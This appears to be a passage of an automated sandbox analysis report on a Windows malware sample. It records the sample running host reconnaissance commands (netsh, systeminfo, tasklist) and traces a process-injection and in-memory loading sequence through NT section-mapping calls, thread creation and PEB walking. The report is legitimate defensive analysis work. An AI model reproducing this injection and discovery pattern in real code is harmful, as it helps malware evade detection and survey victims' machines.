                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:34
                                                                      Start time:10:03:12
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh firewall show state
                                                                      Imagebase:0x7ff733e80000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:35
                                                                      Start time:10:03:13
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:systeminfo
                                                                      Imagebase:0x7ff7e1830000
                                                                      File size:110'080 bytes
                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:37
                                                                      Start time:10:03:17
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:tasklist /v /fo csv
                                                                      Imagebase:0x7ff6e0b20000
                                                                      File size:106'496 bytes
                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false


                                                                        Execution Graph

                                                                        Execution Coverage:7.4%
                                                                        Dynamic/Decrypted Code Coverage:42.6%
                                                                        Signature Coverage:43.4%
                                                                        Total number of Nodes:122
                                                                        Total number of Limit Nodes:4

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 746464f9963faf83baa7a7e4d1d503d9951592239326ed203a5fdafee77b7e4e
                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                        • Opcode Fuzzy Hash: 746464f9963faf83baa7a7e4d1d503d9951592239326ed203a5fdafee77b7e4e
                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                        • String ID:
                                                                        • API String ID: 1652636561-0
                                                                        • Opcode ID: 304dad40bd57fde4ad2d107e796ee4bd6f67db99f64be0045c1c988ef19b7cdc
                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                        • Opcode Fuzzy Hash: 304dad40bd57fde4ad2d107e796ee4bd6f67db99f64be0045c1c988ef19b7cdc
                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 581fa83bc263e791d9971d53db0324000e8585e44ca574a313370521a86a7cc8
                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                        • Opcode Fuzzy Hash: 581fa83bc263e791d9971d53db0324000e8585e44ca574a313370521a86a7cc8
                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: a43cc433937968852615b5a1196453d78d887ea4f5a0bea8b59419441baeb33d
                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                        • Opcode Fuzzy Hash: a43cc433937968852615b5a1196453d78d887ea4f5a0bea8b59419441baeb33d
                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 29d42f42a6cc8ee6b1305037c54c44870b6144e25efa99f681edebb2ee70e80b
                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                        • Opcode Fuzzy Hash: 29d42f42a6cc8ee6b1305037c54c44870b6144e25efa99f681edebb2ee70e80b
                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0266F956
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0266F976
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_265d000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0260024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2600000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02600223,?,?), ref: 02600E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02600223,?,?), ref: 02600E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2600000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0266F63E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_265d000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2600000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$GetProcAddress.$l
                                                                        • API String ID: 0-2784972518
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                                                        • Instruction ID: 83c2e45a663ff97a83121d71df7fde14c7d1be506299b7fe0adcc4aca9f65d16
                                                                        • Opcode Fuzzy Hash: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                                                        • Instruction Fuzzy Hash: 3211CBA1C1D2825BDFAA1E2108544B67F6CAA7771771400FFD402BA2D6E23D5B02929E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_265d000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction ID: 462ddb0c0d891abfaf7b668c3e140b9cb3c0f520e0d1922a52c7d74fc628237d
                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction Fuzzy Hash: 08117C76340100AFDB44DF95ECC5FA673EEEB89260B198169E909CB716D675E802CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                                                        • Instruction ID: 18a3bc8234d562e7f0c7d25340e1ec3d72d942eb246f5034c2dedc7c4f371e85
                                                                        • Opcode Fuzzy Hash: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                                                        • Instruction Fuzzy Hash: 3611E191D1C2820BDFA62E2048545B67F6C5A7335771840FFD401F62D6F13D1F02825A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2600000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction ID: d10e995d2db6a1428a3ef6daa5930c0b608f74a31719e55c82f14bd61f557778
                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction Fuzzy Hash: 6901A276A106048FDF25CF24C884BAB33E9EB86216F4544A5D90AA73C2E774A9818B90

                                                                        Execution Graph

                                                                        Execution Coverage: 7.7%
                                                                        Dynamic/Decrypted Code Coverage: 42.6%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 122
                                                                        Total number of Limit Nodes: 4
                                                                        execution_graph 3472 402e40 3475 402e37 3472->3475 3473 402edf 3475->3473 3476 4018e6 3475->3476 3477 4018f5 3476->3477 3478 40192e Sleep 3477->3478 3479 401949 3478->3479 3481 40195a 3479->3481 3482 401514 3479->3482 3481->3473 3483 401524 3482->3483 3484 4015c4 NtDuplicateObject 3483->3484 3488 4016e0 3483->3488 3485 4015e1 NtCreateSection 3484->3485 3484->3488 3486 401661 NtCreateSection 3485->3486 3487 401607 NtMapViewOfSection 3485->3487 3486->3488 3490 40168d 3486->3490 3487->3486 3489 40162a NtMapViewOfSection 3487->3489 3488->3481 3489->3486 3491 401648 3489->3491 3490->3488 3492 401697 NtMapViewOfSection 3490->3492 3491->3486 3492->3488 3493 4016be NtMapViewOfSection 3492->3493 3493->3488 3593 401542 3594 40153b 3593->3594 3595 4015c4 NtDuplicateObject 3594->3595 3599 4016e0 3594->3599 3596 4015e1 NtCreateSection 3595->3596 3595->3599 3597 401661 NtCreateSection 3596->3597 3598 401607 NtMapViewOfSection 3596->3598 3597->3599 3601 40168d 3597->3601 3598->3597 3600 40162a NtMapViewOfSection 3598->3600 3600->3597 3602 401648 3600->3602 3601->3599 3603 401697 NtMapViewOfSection 3601->3603 3602->3597 3603->3599 3604 4016be NtMapViewOfSection 3603->3604 3604->3599 3589 26dea85 3590 26deaa5 3589->3590 3591 26df236 3 API calls 3590->3591 3592 26deaae 3591->3592 3513 252003c 3514 2520049 3513->3514 3526 2520e0f SetErrorMode SetErrorMode 3514->3526 3519 2520265 3520 25202ce VirtualProtect 3519->3520 3522 252030b 3520->3522 3521 2520439 VirtualFree 3525 25204be LoadLibraryA 3521->3525 3522->3521 3524 25208c7 3525->3524 3527 2520223 3526->3527 3528 2520d90 3527->3528 3529 2520dad 3528->3529 3530 2520dbb GetPEB 3529->3530 3531 2520238 VirtualAlloc 3529->3531 3530->3531 3531->3519 3652 402dd0 3654 402ddc 3652->3654 3653 4018e6 8 API calls 3655 402edf 3653->3655 3654->3653 3654->3655 3570 4018f1 3571 4018f6 3570->3571 3572 40192e Sleep 3571->3572 3573 401949 3572->3573 3574 401514 7 API calls 
3573->3574 3575 40195a 3573->3575 3574->3575 3532 2520001 3533 2520005 3532->3533 3538 252092b GetPEB 3533->3538 3535 2520030 3540 252003c 3535->3540 3539 2520972 3538->3539 3539->3535 3541 2520049 3540->3541 3542 2520e0f 2 API calls 3541->3542 3543 2520223 3542->3543 3544 2520d90 GetPEB 3543->3544 3545 2520238 VirtualAlloc 3544->3545 3546 2520265 3545->3546 3547 25202ce VirtualProtect 3546->3547 3549 252030b 3547->3549 3548 2520439 VirtualFree 3552 25204be LoadLibraryA 3548->3552 3549->3548 3551 25208c7 3552->3551 3639 401915 3640 40191a 3639->3640 3641 4018c6 3639->3641 3642 40192e Sleep 3640->3642 3643 401949 3642->3643 3644 401514 7 API calls 3643->3644 3645 40195a 3643->3645 3644->3645 3494 402f97 3495 4030ee 3494->3495 3496 402fc1 3494->3496 3496->3495 3497 40307c RtlCreateUserThread NtTerminateProcess 3496->3497 3497->3495 3553 2520005 3554 252092b GetPEB 3553->3554 3555 2520030 3554->3555 3556 252003c 7 API calls 3555->3556 3557 2520038 3556->3557 3498 26dea96 3499 26deaa5 3498->3499 3502 26df236 3499->3502 3507 26df251 3502->3507 3503 26df25a CreateToolhelp32Snapshot 3504 26df276 Module32First 3503->3504 3503->3507 3505 26deaae 3504->3505 3506 26df285 3504->3506 3509 26deef5 3506->3509 3507->3503 3507->3504 3510 26def20 3509->3510 3511 26def69 3510->3511 3512 26def31 VirtualAlloc 3510->3512 3511->3511 3512->3511 3629 402d7b 3631 402d38 3629->3631 3630 4018e6 8 API calls 3632 402dc7 3630->3632 3631->3629 3631->3630 3631->3632 3576 4014fe 3577 401506 3576->3577 3578 401531 3576->3578 3579 4015c4 NtDuplicateObject 3578->3579 3583 4016e0 3578->3583 3580 4015e1 NtCreateSection 3579->3580 3579->3583 3581 401661 NtCreateSection 3580->3581 3582 401607 NtMapViewOfSection 3580->3582 3581->3583 3585 40168d 3581->3585 3582->3581 3584 40162a NtMapViewOfSection 3582->3584 3584->3581 3586 401648 3584->3586 3585->3583 3587 401697 NtMapViewOfSection 3585->3587 3586->3581 3587->3583 3588 4016be NtMapViewOfSection 3587->3588 3588->3583

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 115 4015c4-4015db NtDuplicateObject 104->115 105->106 112 4018c5 106->112 113 4018bc-4018e3 call 401193 106->113 112->113 115->105 117 4015e1-401605 NtCreateSection 115->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 123 40168d-401691 119->123 120->119 122 40162a-401646 NtMapViewOfSection 120->122 122->119 125 401648-40165e 122->125 123->105 126 401697-4016b8 NtMapViewOfSection 123->126 125->119 126->105 128 4016be-4016da NtMapViewOfSection 126->128 128->105 129 4016e0 call 4016e5 128->129
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
